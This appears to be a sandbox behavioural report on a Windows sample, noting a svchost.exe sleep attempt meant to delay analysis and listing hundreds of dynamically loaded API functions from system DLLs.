A process attempted to delay the analysis task.
Process: svchost.exe tried to sleep 481 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: KERNELBASE.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: propsys.dll/PSLookupPropertyHandlerCLSID
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: propsys.dll/PSCreatePropertyStoreFromObject
DynamicLoader: propsys.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/PropVariantToBuffer
DynamicLoader: propsys.dll/PropVariantToUInt64
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: propsys.dll/InitPropVariantFromBuffer
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/TreeSetNamedSecurityInfoW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: KERNELBASE.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: KERNELBASE.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptDuplicateHash
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: wersvc.dll/ServiceMain
DynamicLoader: wersvc.dll/SvchostPushServiceGlobals
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: faultrep.dll/WerpInitiateCrashReporting
DynamicLoader: wer.dll/WerpCreateMachineStore
DynamicLoader: SHELL32.dll/SHGetFolderPathEx
DynamicLoader: ole32.dll/StringFromGUID2
DynamicLoader: profapi.dll/
DynamicLoader: SHELL32.dll/SHGetFolderPathEx
DynamicLoader: USERENV.dll/CreateEnvironmentBlock
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: SspiCli.dll/GetUserNameExW
DynamicLoader: USERENV.dll/DestroyEnvironmentBlock
DynamicLoader: LPK.dll/LpkEditControl
DynamicLoader: IMM32.dll/ImmDisableIME
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: LPK.dll/LpkEditControl
DynamicLoader: IMM32.dll/ImmDisableIME
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: wer.dll/WerpCreateIntegratorReportId
DynamicLoader: wer.dll/WerReportCreate
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: wer.dll/WerpSetIntegratorReportId
DynamicLoader: wer.dll/WerReportSetParameter
DynamicLoader: dbgeng.dll/DebugCreate
DynamicLoader: ntdll.dll/CsrGetProcessId
DynamicLoader: ntdll.dll/DbgBreakPoint
DynamicLoader: ntdll.dll/DbgPrint
DynamicLoader: ntdll.dll/DbgPrompt
DynamicLoader: ntdll.dll/DbgUiConvertStateChangeStructure
DynamicLoader: ntdll.dll/DbgUiGetThreadDebugObject
DynamicLoader: ntdll.dll/DbgUiIssueRemoteBreakin
DynamicLoader: ntdll.dll/DbgUiSetThreadDebugObject
DynamicLoader: ntdll.dll/NtAllocateVirtualMemory
DynamicLoader: ntdll.dll/NtClose
DynamicLoader: ntdll.dll/NtCreateDebugObject
DynamicLoader: ntdll.dll/NtCreateFile
DynamicLoader: ntdll.dll/NtDebugActiveProcess
DynamicLoader: ntdll.dll/NtDebugContinue
DynamicLoader: ntdll.dll/NtFreeVirtualMemory
DynamicLoader: ntdll.dll/NtOpenProcess
DynamicLoader: ntdll.dll/NtOpenThread
DynamicLoader: ntdll.dll/NtQueryInformationProcess
DynamicLoader: ntdll.dll/NtQueryInformationThread
DynamicLoader: ntdll.dll/NtQueryMutant
DynamicLoader: ntdll.dll/NtQueryObject
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtRemoveProcessDebug
DynamicLoader: ntdll.dll/NtResumeThread
DynamicLoader: ntdll.dll/NtSetInformationDebugObject
DynamicLoader: ntdll.dll/NtSetInformationProcess
DynamicLoader: ntdll.dll/NtSystemDebugControl
DynamicLoader: ntdll.dll/NtWaitForDebugEvent
DynamicLoader: ntdll.dll/RtlAnsiStringToUnicodeString
DynamicLoader: ntdll.dll/RtlCreateProcessParameters
DynamicLoader: ntdll.dll/RtlCreateUserProcess
DynamicLoader: ntdll.dll/RtlDestroyProcessParameters
DynamicLoader: ntdll.dll/RtlDosPathNameToNtPathName_U
DynamicLoader: ntdll.dll/RtlFindMessage
DynamicLoader: ntdll.dll/RtlFreeHeap
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/RtlGetFunctionTableListHead
DynamicLoader: ntdll.dll/RtlGetUnloadEventTrace
DynamicLoader: ntdll.dll/RtlGetUnloadEventTraceEx
DynamicLoader: ntdll.dll/RtlInitAnsiString
DynamicLoader: ntdll.dll/RtlInitUnicodeString
DynamicLoader: ntdll.dll/RtlTryEnterCriticalSection
DynamicLoader: ntdll.dll/RtlUnicodeStringToAnsiString
DynamicLoader: ntdll.dll/NtOpenProcessToken
DynamicLoader: ntdll.dll/NtOpenThreadToken
DynamicLoader: ntdll.dll/NtQueryInformationToken
DynamicLoader: kernel32.dll/CloseProfileUserMapping
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/DebugActiveProcessStop
DynamicLoader: kernel32.dll/DebugBreak
DynamicLoader: kernel32.dll/DebugBreakProcess
DynamicLoader: kernel32.dll/DebugSetProcessKillOnExit
DynamicLoader: kernel32.dll/Module32First
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/Module32Next
DynamicLoader: kernel32.dll/Module32NextW
DynamicLoader: kernel32.dll/OpenThread
DynamicLoader: kernel32.dll/Process32First
DynamicLoader: kernel32.dll/Process32FirstW
DynamicLoader: kernel32.dll/Process32Next
DynamicLoader: kernel32.dll/Process32NextW
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: kernel32.dll/SetProcessShutdownParameters
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/GetTimeZoneInformation
DynamicLoader: kernel32.dll/DuplicateHandle
DynamicLoader: kernel32.dll/Wow64GetThreadSelectorEntry
DynamicLoader: ADVAPI32.dll/CloseServiceHandle
DynamicLoader: ADVAPI32.dll/ControlService
DynamicLoader: ADVAPI32.dll/CreateServiceA
DynamicLoader: ADVAPI32.dll/CreateServiceW
DynamicLoader: ADVAPI32.dll/DeleteService
DynamicLoader: ADVAPI32.dll/EnumServicesStatusExA
DynamicLoader: ADVAPI32.dll/EnumServicesStatusExW
DynamicLoader: ADVAPI32.dll/GetEventLogInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenSCManagerA
DynamicLoader: ADVAPI32.dll/OpenSCManagerW
DynamicLoader: ADVAPI32.dll/OpenServiceA
DynamicLoader: ADVAPI32.dll/OpenServiceW
DynamicLoader: ADVAPI32.dll/StartServiceA
DynamicLoader: ADVAPI32.dll/StartServiceW
DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeExW
DynamicLoader: VERSION.dll/GetFileVersionInfoExW
DynamicLoader: wer.dll/WerReportAddDump
DynamicLoader: wer.dll/WerpSetCallBack
DynamicLoader: wer.dll/WerReportSetUIOption
DynamicLoader: wer.dll/WerpAddRegisteredDataToReport
DynamicLoader: wer.dll/WerReportSubmit
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: USER32.dll/GetProcessWindowStation
DynamicLoader: USER32.dll/GetThreadDesktop
DynamicLoader: USER32.dll/GetUserObjectInformationW
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: SensApi.dll/IsNetworkAlive
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: USER32.dll/CharUpperW
DynamicLoader: werui.dll/WerUICreate
DynamicLoader: werui.dll/WerUIStart
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: DUI70.dll/InitProcessPriv
DynamicLoader: COMCTL32.dll/LoadIconWithScaleDown
DynamicLoader: ntdll.dll/RtlRunEncodeUnicodeString
DynamicLoader: ntdll.dll/RtlInitUnicodeString
DynamicLoader: ntdll.dll/RtlRunDecodeUnicodeString
DynamicLoader: DUI70.dll/InitThread
DynamicLoader: DUser.dll/InitGadgets
DynamicLoader: USER32.dll/RegisterMessagePumpHook
DynamicLoader: DUI70.dll/?GetClassInfoPtr@CCBase@DirectUI@@SAPEAUIClassInfo@2@XZ
DynamicLoader: DUI70.dll/?GetFactoryLock@Element@DirectUI@@SAPEAU_RTL_CRITICAL_SECTION@@XZ
DynamicLoader: DUI70.dll/??0CritSecLock@DirectUI@@QEAA@PEAU_RTL_CRITICAL_SECTION@@@Z
DynamicLoader: DUI70.dll/?ClassExist@ClassInfoBase@DirectUI@@SA_NPEAPEAUIClassInfo@2@PEBQEBUPropertyInfo@2@IPEAU32@PEAUHINSTANCE__@@PEBG_N@Z
DynamicLoader: DUI70.dll/??0ClassInfoBase@DirectUI@@QEAA@XZ
DynamicLoader: DUI70.dll/?Initialize@ClassInfoBase@DirectUI@@QEAAJPEAUHINSTANCE__@@PEBG_NPEBQEBUPropertyInfo@2@I@Z
DynamicLoader: DUI70.dll/?Register@ClassInfoBase@DirectUI@@QEAAJXZ
DynamicLoader: DUI70.dll/?IsGlobal@ClassInfoBase@DirectUI@@UEBA_NXZ
DynamicLoader: DUI70.dll/?GetName@ClassInfoBase@DirectUI@@UEBAPEBGXZ
DynamicLoader: DUI70.dll/?GetModule@ClassInfoBase@DirectUI@@UEBAPEAUHINSTANCE__@@XZ
DynamicLoader: DUI70.dll/??1CritSecLock@DirectUI@@QEAA@XZ
DynamicLoader: DUI70.dll/??0CCBase@DirectUI@@QEAA@KPEBG@Z
DynamicLoader: DUI70.dll/?Initialize@CCBase@DirectUI@@QEAAJIPEAVElement@2@PEAK@Z
DynamicLoader: DUser.dll/CreateGadget
DynamicLoader: DUser.dll/SetGadgetMessageFilter
DynamicLoader: DUser.dll/SetGadgetStyle
DynamicLoader: DUI70.dll/?OnPropertyChanging@Element@DirectUI@@UEAA_NPEBUPropertyInfo@2@HPEAVValue@2@1@Z
DynamicLoader: DUI70.dll/?HandleUiaPropertyChangingListener@Element@DirectUI@@UEAAXPEBUPropertyInfo@2@@Z
DynamicLoader: DUI70.dll/?HandleUiaPropertyListener@Element@DirectUI@@UEAAXPEBUPropertyInfo@2@HPEAVValue@2@1@Z
DynamicLoader: DUI70.dll/?DirectionProp@Element@DirectUI@@SAPEBUPropertyInfo@2@XZ
DynamicLoader: DUI70.dll/?OnPropertyChanged@CCBase@DirectUI@@UEAAXPEBUPropertyInfo@2@HPEAVValue@2@1@Z
DynamicLoader: DUI70.dll/?SetFontSize@Element@DirectUI@@QEAAJH@Z
DynamicLoader: DUI70.dll/?SetWidth@Element@DirectUI@@QEAAJH@Z
DynamicLoader: DUI70.dll/?SetHeight@Element@DirectUI@@QEAAJH@Z
DynamicLoader: DUI70.dll/?EndDefer@Element@DirectUI@@QEAAXK@Z
DynamicLoader: DUI70.dll/?OnGroupChanged@Element@DirectUI@@UEAAXH_N@Z
DynamicLoader: DUser.dll/InvalidateGadget
DynamicLoader: DUI70.dll/CreateDUIWrapper
DynamicLoader: SHELL32.dll/ExtractIconExW
DynamicLoader: COMCTL32.dll/TaskDialogIndirect
DynamicLoader: COMCTL32.dll/LoadIconWithScaleDown
DynamicLoader: ntdll.dll/RtlRunEncodeUnicodeString
DynamicLoader: ntdll.dll/RtlInitUnicodeString
DynamicLoader: ntdll.dll/RtlRunDecodeUnicodeString
DynamicLoader: DUser.dll/InitGadgets
DynamicLoader: UxTheme.dll/IsThemeActive
DynamicLoader: DUser.dll/CreateGadget
DynamicLoader: DUser.dll/DisableContainerHwnd
DynamicLoader: DUser.dll/DUserFlushMessages
DynamicLoader: DUser.dll/DUserFlushDeferredMessages
DynamicLoader: DUser.dll/DeleteHandle
DynamicLoader: DUI70.dll/UnInitThread
DynamicLoader: DUser.dll/DUserFlushMessages
DynamicLoader: DUser.dll/DUserFlushDeferredMessages
DynamicLoader: DUser.dll/DeleteHandle
DynamicLoader: DUI70.dll/?MessageCallback@HWNDHost@DirectUI@@UEAAIPEAUtagGMSG@@@Z
DynamicLoader: DUI70.dll/?HandleUiaDestroyListener@Element@DirectUI@@UEAAXXZ
DynamicLoader: DUI70.dll/?OnDestroy@HWNDHost@DirectUI@@UEAAXXZ
DynamicLoader: DUI70.dll/??1CCBase@DirectUI@@UEAA@XZ
DynamicLoader: USER32.dll/UnregisterMessagePumpHook
DynamicLoader: DUI70.dll/UnInitProcessPriv
DynamicLoader: DUI70.dll/?Release@ClassInfoBase@DirectUI@@UEAAHXZ
DynamicLoader: DUI70.dll/?GetGlobalIndex@ClassInfoBase@DirectUI@@UEBAIXZ
DynamicLoader: DUI70.dll/??1ClassInfoBase@DirectUI@@UEAA@XZ
DynamicLoader: COMCTL32.dll/LoadIconWithScaleDown
DynamicLoader: ntdll.dll/RtlRunEncodeUnicodeString
DynamicLoader: ntdll.dll/RtlInitUnicodeString
DynamicLoader: ntdll.dll/RtlRunDecodeUnicodeString
DynamicLoader: USER32.dll/RegisterMessagePumpHook
DynamicLoader: USER32.dll/UnregisterMessagePumpHook
DynamicLoader: CFGMGR32.dll/CMP_UnregisterNotification
DynamicLoader: WINSTA.dll/WinStationRegisterConsoleNotification
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: RPCRT4.dll/RpcAsyncInitializeHandle
DynamicLoader: WTSAPI32.dll/WTSRegisterSessionNotification
DynamicLoader: USER32.dll/IsWindow
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: WINSTA.dll/WinStationRegisterConsoleNotification
DynamicLoader: RPCRT4.dll/Ndr64AsyncClientCall
DynamicLoader: DUI70.dll/InitProcessPriv
DynamicLoader: DUI70.dll/InitThread
DynamicLoader: USER32.dll/RegisterMessagePumpHook
DynamicLoader: DUI70.dll/?GetClassInfoPtr@Element@DirectUI@@SAPEAUIClassInfo@2@XZ
DynamicLoader: DUI70.dll/?GetFactoryLock@Element@DirectUI@@SAPEAU_RTL_CRITICAL_SECTION@@XZ
DynamicLoader: DUI70.dll/??0CritSecLock@DirectUI@@QEAA@PEAU_RTL_CRITICAL_SECTION@@@Z
DynamicLoader: DUI70.dll/?ClassExist@ClassInfoBase@DirectUI@@SA_NPEAPEAUIClassInfo@2@PEBQEBUPropertyInfo@2@IPEAU32@PEAUHINSTANCE__@@PEBG_N@Z
DynamicLoader: DUI70.dll/??0ClassInfoBase@DirectUI@@QEAA@XZ
DynamicLoader: DUI70.dll/?Initialize@ClassInfoBase@DirectUI@@QEAAJPEAUHINSTANCE__@@PEBG_NPEBQEBUPropertyInfo@2@I@Z
DynamicLoader: DUI70.dll/?Register@ClassInfoBase@DirectUI@@QEAAJXZ
DynamicLoader: DUI70.dll/?IsGlobal@ClassInfoBase@DirectUI@@UEBA_NXZ
DynamicLoader: DUI70.dll/?GetName@ClassInfoBase@DirectUI@@UEBAPEBGXZ
DynamicLoader: DUI70.dll/?GetModule@ClassInfoBase@DirectUI@@UEBAPEAUHINSTANCE__@@XZ
DynamicLoader: DUI70.dll/??1CritSecLock@DirectUI@@QEAA@XZ
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: ole32.dll/CLSIDFromString
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: UxTheme.dll/IsThemeActive
DynamicLoader: UxTheme.dll/IsCompositionActive
DynamicLoader: UxTheme.dll/OpenThemeData
DynamicLoader: SHELL32.dll/SHAppBarMessage
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: SHELL32.dll/SHFileOperationW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/InitPropVariantFromBuffer
DynamicLoader: PROPSYS.dll/PropVariantToBuffer
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: srvcli.dll/NetShareGetInfo
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: POWRPROF.dll/PowerSettingRegisterNotification
DynamicLoader: comctl32.dll/
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: comctl32.dll/
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ncsi.dll/NcsiIdentifyUserSpecificProxies
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: CSCAPI.dll/OfflineFilesQueryStatus
DynamicLoader: ADVAPI32.dll/RegNotifyChangeKeyValue
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemRealloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: comctl32.dll/
DynamicLoader: USER32.dll/ChangeWindowMessageFilter
DynamicLoader: webcheck.dll/SystemFunction009
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoSetProxyBlanket
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/IsValidSid
DynamicLoader: ADVAPI32.dll/GetLengthSid
DynamicLoader: ADVAPI32.dll/CopySid
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
